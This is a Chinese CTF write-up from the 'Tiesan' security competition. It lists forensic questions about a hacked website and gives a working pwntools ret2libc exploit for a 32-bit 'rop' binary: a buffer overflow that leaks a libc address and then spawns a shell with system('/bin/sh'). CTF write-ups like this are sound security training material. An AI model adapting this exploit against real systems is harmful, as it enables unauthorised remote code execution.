铁人三项赛——部分WP(数据赛,个人赛1)

铁人三项赛——数据赛WP

1.网站后台密码是多少?


第一题-1.PNG

第一题-2.PNG

2.攻击者IP是多少?

第二题.PNG

3.网站后台登陆地址是多少(http://+IP+路径)?


第三题.PNG

4.后台写入的Webshell内容是什么?

第四题-1.PNG
第四题-2.PNG

5.网站数据库密码是多少?


第五题.PNG

6.黑客第一个上传的php文件名是什么?

第六题-1.PNG
第六题-2.PNG

7.黑客对内网扫描的范围是多少(ip1-ip2)?

第七题.PNG

8.黑客下载的数据库备份文件名是什么?

第八题-1.PNG
第八题-2.PNG
第八题-3.PNG

9.黑客上传的图片木马的密码是多少?

第九题.PNG

10.黑客修改了哪个文件来配合木马文件(绝对路径)?

第十题-1.PNG
第十题-2.PNG

11.FTP服务器开在了哪个端口?

第十一题.PNG

12.黑客使用FTP上传的文件名?

第十二题.PNG

13.黑客登陆FTP的密码是多少?

第十三题.PNG

14.黑客使用FTP上传的文件中的文件内容是什么?

第十四题.PNG

铁人三项赛——个人赛部分WP

1.rop

发现vulnerable_function()中存在溢出漏洞

个人赛-1.PNG

它申请了0x88的内存


个人赛-2.PNG

却读入了0x100的内容


个人赛-3.png

最后通过地址的覆盖拿到shell,以前有做过这类题,改了改参数,这是代码~

from pwn import *
DEBUG = 0
if DEBUG:
     #p = process('./rop')
     #scontext.log_level = 'debug'
     #libc = ELF('/lib32/libc-2.24.so')
     p = process(['./rop'], env={'LD_PRELOAD': os.path.join(os.getcwd(),'libc32')})
     libc = ELF('./libc32')
     
else:
     p = remote('比赛ip',端口号)
     libc = ELF('./libc32')
     #libc = ELF('libc_64.so.6')
#context.log_level = 'debug'

vuln_func=0x8048474
write_plt=0x80483A0    
write_got=0x804a010    
#free 0x134d

#gdb.attach(p,"b*0x804849C")
data='a'*0x88+'a'*4+p32(write_plt)+p32(vuln_func)+p32(1)+p32(write_got)+p32(0x4)
p.send(data)
write_addr=u32(p.recv(4))
libc_base=write_addr-libc.symbols['write']
system_addr=libc_base+libc.symbols['system']
binsh_addr=libc_base+next(libc.search('/bin/sh'))
data='a'*0x88+'a'*4+p32(system_addr)+'aaaa'+p32(binsh_addr)
p.send(data)
p.interactive()

萌新拙作,若有错误还请野生大佬指出(>人<;)~

推荐阅读更多精彩内容

  • WriteUps 信息安全铁人三项赛总决赛总结(企业赛)信息安全铁人三项赛总决赛(数据赛)第二题信息安全铁人三项赛...
    王一航阅读 5,118评论 0 11
  • 1、第八章 Samba服务器2、第八章 NFS服务器3、第十章 Linux下DNS服务器配站点,域名解析概念命令:...
    哈熝少主阅读 2,690评论 0 10
  • 部分内容转载自搜狗百科 cmd是command的缩写.即命令提示符(CMD),是在OS / 2 , Windows...
    青冥之上阅读 1,720评论 0 24
  • win7 cmd管理员权限设置 net localgroup administrators 用户名 /add 把“...
    御坂网络阅读 3,428评论 0 11
  • 作者/胄宁 那年你写下的雨, 是我遗落多时的记忆。 听晨花寄来的情语, 看红叶飘零了一地。 雨点随着西风远去, 形...
    胄宁阅读 548评论 12 12